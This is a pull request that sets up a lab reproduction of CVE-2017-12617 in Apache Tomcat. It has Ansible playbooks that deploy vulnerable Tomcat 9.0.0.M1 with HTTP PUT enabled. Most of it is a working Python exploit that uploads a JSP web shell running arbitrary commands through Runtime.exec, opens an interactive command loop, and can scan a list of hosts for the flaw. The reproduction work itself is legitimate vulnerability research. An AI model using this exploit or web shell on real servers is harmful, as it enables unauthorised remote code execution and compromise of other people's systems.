### PR TITLE
CVEX-2017-12617 initial commit

### DIFF
--- a/CVE-2017-12617/cvex.yml
+++ b/CVE-2017-12617/cvex.yml
@@ -1,0 +1,14 @@
+blueprint: ubuntu2204
+ubuntu:
+  trace: nginx
+  playbook: ubuntu.yml
+  command:
+    - "sudo chown -R vagrant:vagrant /home/vagrant/apache-tomcat-9.0.0.M1"  
+    - "sudo chmod -R 755 /home/vagrant/apache-tomcat-9.0.0.M1"
+    - "sed -i.bak 's/>listings</>readonly</g' /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml"
+    - "cat /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml | grep -A 5 -B 5 readonly"
+    - "cd /home/vagrant/apache-tomcat-9.0.0.M1/bin && ./startup.sh&~~~Tomcat started"
+    - "sleep 10"  # Wait for Tomcat to fully start
+    - "sudo chmod 755 /home/vagrant/data/exploit.py"
+    - "sudo chmod -R 755 /home/vagrant/data"
+    - "python3 /home/vagrant/data/exploit.py -u http://%ubuntu%:8080"

--- a/CVE-2017-12617/cvex.yml
+++ b/CVE-2017-12617/cvex.yml
@@ -1,6 +1,9 @@
-blueprint: ubuntu2204
-ubuntu:
+blueprint: ubuntu2204-ubuntu2204
+ubuntu1:
   trace: nginx
-  playbook: ubuntu.yml
+  playbook: ubuntu1.yml
+ubuntu2:
+  trace: "python3"
+  playbook: ubuntu2.yml
   command:
-    - "python3 /home/vagrant/data/exploit.py -u http://%ubuntu%:8080"
+    - "python3 /opt/exploit/exploit.py -u http://%ubuntu1%:8080"

--- a/CVE-2017-12617/cvex.yml
+++ b/CVE-2017-12617/cvex.yml
@@ -3,12 +3,4 @@ ubuntu:
   trace: nginx
   playbook: ubuntu.yml
   command:
-    - "sudo chown -R vagrant:vagrant /home/vagrant/apache-tomcat-9.0.0.M1"  
-    - "sudo chmod -R 755 /home/vagrant/apache-tomcat-9.0.0.M1"
-    - "sed -i.bak 's/>listings</>readonly</g' /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml"
-    - "cat /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml | grep -A 5 -B 5 readonly"
-    - "cd /home/vagrant/apache-tomcat-9.0.0.M1/bin && ./startup.sh&~~~Tomcat started"
-    - "sleep 10"  # Wait for Tomcat to fully start
-    - "sudo chmod 755 /home/vagrant/data/exploit.py"
-    - "sudo chmod -R 755 /home/vagrant/data"
     - "python3 /home/vagrant/data/exploit.py -u http://%ubuntu%:8080"

--- a/CVE-2017-12617/data/exploit.py
+++ b/CVE-2017-12617/data/exploit.py
@@ -1,0 +1,197 @@
+#!/usr/bin/python
+import requests
+import re
+import signal
+from optparse import OptionParser
+
+class bcolors:
+    HEADER = '\033[95m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
+
+
+banner="""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+                                                                           
+                                                                           
+
+[@intx0x80]
+
+"""
+
+
+def signal_handler(signal, frame):
+
+    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
+
+    exit()
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+
+
+def removetags(tags):
+  remove = re.compile('<.*?>')
+  txt = re.sub(remove, '\n', tags)
+  return txt.replace("\n\n\n","\n")
+
+
+def getContent(url,f):
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    re=requests.get(str(url)+"/"+str(f), headers=headers)
+    return re.content
+
+def createPayload(url,f):
+    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
+    if req.status_code==201:
+        print ("File Created ..")
+
+   
+def RCE(url,f):
+    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
+    <INPUT name='cmd' type=text>
+    <INPUT type=submit value='Run'>
+    </FORM>
+    <%@ page import="java.io.*" %>
+    <%
+    String cmd = request.getParameter("cmd");
+    String output = "";
+    if(cmd != null) {
+        String s = null;
+        try {
+            Process p = Runtime.getRuntime().exec(cmd,null,null);
+            BufferedReader sI = new BufferedReader(new
+    InputStreamReader(p.getInputStream()));
+    while((s = sI.readLine()) != null) { output += s+"</br>"; }
+      }  catch(IOException e) {   e.printStackTrace();   }
+   }
+%>
+<pre><%=output %></pre>"""
+
+
+    
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    
+    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
+    
+
+
+def shell(url,f):
+    
+    while True:
+        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+        cmd=input("$ ")
+        payload={'cmd':cmd}
+        if cmd=="q" or cmd=="Q":
+                break
+        
+        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
+        re=str(re.content)
+        t=removetags(re)
+        print (t)
+
+#print bcolors.HEADER+ banner+bcolors.ENDC
+
+parse=OptionParser(
+
+
+bcolors.HEADER+"""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+                                                                           
+                                                                           
+
+
+./cve-2017-12617.py [options]
+
+options:
+
+-u ,--url [::] check target url if it's vulnerable 
+-p,--pwn  [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+[+]usage:
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+
+
+[@intx0x80]
+
+"""+bcolors.ENDC
+
+    )
+
+
+parse.add_option("-u","--url",dest="U",type="string",help="Website Url")          
+parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
+parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
+
+(opt,args)=parse.parse_args()
+
+if opt.U==None and opt.P==None and opt.L==None:
+    print(parse.usage)
+    exit(0)
+
+
+
+else:
+    if opt.U!=None and opt.P==None and opt.L==None:
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        url=str(opt.U)
+        checker="Poc.jsp"
+        print (bcolors.BOLD +"Poc Filename  {}".format(checker))
+        createPayload(str(url)+"/",checker)
+        con=getContent(str(url)+"/",checker)
+        if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+            print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
+            print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
+    
+        else:
+            print ('Not Vulnerable to CVE-2017-12617 ')
+    elif opt.P!=None and opt.U!=None and  opt.L==None:
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        pwn=str(opt.P)
+        url=str(opt.U)
+        print ("Uploading Webshell .....")
+        pwn=pwn+".jsp"
+        RCE(str(url)+"/",pwn)
+        shell(str(url),pwn)
+    elif opt.L!=None and opt.P==None and opt.U==None:
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        w=str(opt.L)
+        f=open(w,"r")
+        print ("Scaning hosts in {}".format(w))
+        checker="Poc.jsp"
+        for i in f.readlines():
+            i=i.strip("\n")
+            createPayload(str(i)+"/",checker)
+            con=getContent(str(i)+"/",checker)
+            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+                print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
+            

--- a/CVE-2017-12617/ubuntu.yml
+++ b/CVE-2017-12617/ubuntu.yml
@@ -1,0 +1,46 @@
+- hosts: ubuntu
+  become: yes
+  tasks:
+    - name: Create data directory
+      file:
+        path: /home/vagrant/data
+        state: directory
+        owner: vagrant
+        group: vagrant
+        mode: '0755'
+      
+    - name: Install Java and Dependencies
+      apt:
+        name: 
+          - default-jdk
+          - python3
+          - python3-pip
+        state: present
+        update_cache: yes
+
+    - name: Install Python Requests Library
+      pip:
+        name: requests
+        state: present
+
+    - name: Copy Tomcat Binary
+      copy:
+        src: data/apache-tomcat-9.0.0.M1.tar.gz
+        dest: /home/vagrant/apache-tomcat-9.0.0.M1.tar.gz
+
+    - name: Extract Tomcat
+      unarchive:
+        src: /home/vagrant/apache-tomcat-9.0.0.M1.tar.gz
+        dest: /home/vagrant/
+        remote_src: yes
+
+    - name: Ensure Tomcat startup script is executable
+      file:
+        path: /home/vagrant/apache-tomcat-9.0.0.M1/bin/startup.sh
+        mode: '+x'
+
+    - name: Copy Exploit Script
+      copy:
+        src: data/exploit.py
+        dest: /home/vagrant/data/exploit.py
+        mode: '+x'

--- a/CVE-2017-12617/ubuntu.yml
+++ b/CVE-2017-12617/ubuntu.yml
@@ -44,3 +44,48 @@
         src: data/exploit.py
         dest: /home/vagrant/data/exploit.py
         mode: '+x'
+
+    - name: Change Tomcat Directory Ownership
+      file:
+        path: /home/vagrant/apache-tomcat-9.0.0.M1
+        owner: vagrant
+        group: vagrant
+        recurse: yes
+
+    - name: Set Tomcat Directory Permissions
+      file:
+        path: /home/vagrant/apache-tomcat-9.0.0.M1
+        mode: '0755'
+        recurse: yes
+
+    - name: Modify Web XML Configuration
+      lineinfile:
+        path: /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml
+        regexp: '<param-name>listings</param-name>'
+        line: '   <param-name>readonly</param-name>'
+        backup: yes
+
+    - name: Verify Web XML Configuration Change
+      command: grep -A 5 -B 5 readonly /home/vagrant/apache-tomcat-9.0.0.M1/conf/web.xml
+
+    - name: Start Tomcat
+      command: ./startup.sh
+      args:
+        chdir: /home/vagrant/apache-tomcat-9.0.0.M1/bin
+      async: 60
+      poll: 0
+
+    - name: Wait for Tomcat to Start
+      pause:
+        seconds: 10
+
+    - name: Set Exploit Script Permissions
+      file:
+        path: /home/vagrant/data/exploit.py
+        mode: '0755'
+
+    - name: Set Data Directory Permissions
+      file:
+        path: /home/vagrant/data
+        mode: '0755'
+        recurse: yes

--- a/CVE-2017-12617/ubuntu1.yml
+++ b/CVE-2017-12617/ubuntu1.yml
@@ -1,4 +1,5 @@
-- hosts: ubuntu
+- name: Install Apache Tomcat vulnerable to JSP File（CVE-2017-12617）
+  hosts: all
   become: yes
   tasks:
     - name: Create data directory
@@ -23,16 +24,10 @@
         name: requests
         state: present
 
-    - name: Copy Tomcat Binary
-      copy:
-        src: data/apache-tomcat-9.0.0.M1.tar.gz
-        dest: /home/vagrant/apache-tomcat-9.0.0.M1.tar.gz
-
     - name: Extract Tomcat
       unarchive:
-        src: /home/vagrant/apache-tomcat-9.0.0.M1.tar.gz
+        src: ./data/apache-tomcat-9.0.0.M1.tar.gz
         dest: /home/vagrant/
-        remote_src: yes
 
     - name: Ensure Tomcat startup script is executable
       file:

--- a/CVE-2017-12617/ubuntu2.yml
+++ b/CVE-2017-12617/ubuntu2.yml
@@ -1,0 +1,28 @@
+- name: Install the exploit for Apache Tomcat JSP File Vulnerability (CVE-2017-12617）
+  hosts: all
+  become: yes
+  tasks:
+    - name: Update apt package index
+      apt:
+        update_cache: yes
+        
+    - name: Install packages
+      ansible.builtin.apt:
+        pkg:
+        - python3
+
+    - name: Create /opt/exploit
+      file:
+        path: /opt/exploit/
+        state: directory
+
+    - name: Copy exploit.py to /opt/exploit
+      ansible.builtin.copy:
+        src: ./data/exploit.py
+        dest: /opt/exploit/exploit.py
+        mode: '+x'
+        
+    - name: Set Exploit Script Permissions
+      file:
+        path: /opt/exploit/exploit.py
+        mode: '0755'


### PR DESCRIPTION
Description:
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

In this CVEX, we successfully upload a sample PoC.jsp file to the server which we verify by checking the contents of the file have been uploaded to the Tomcat webserver. We use Apache Tomcat version 9.0.0.M1.


Sample output:
[CVE-2017-12617-output.txt](https://github.com/user-attachments/files/17824699/CVE-2017-12617-output.txt)


References:
https://github.com/advisories/GHSA-xjgh-84hx-56c5
[https://nvd.nist.gov/vuln/detail/CVE-2017-12617](url)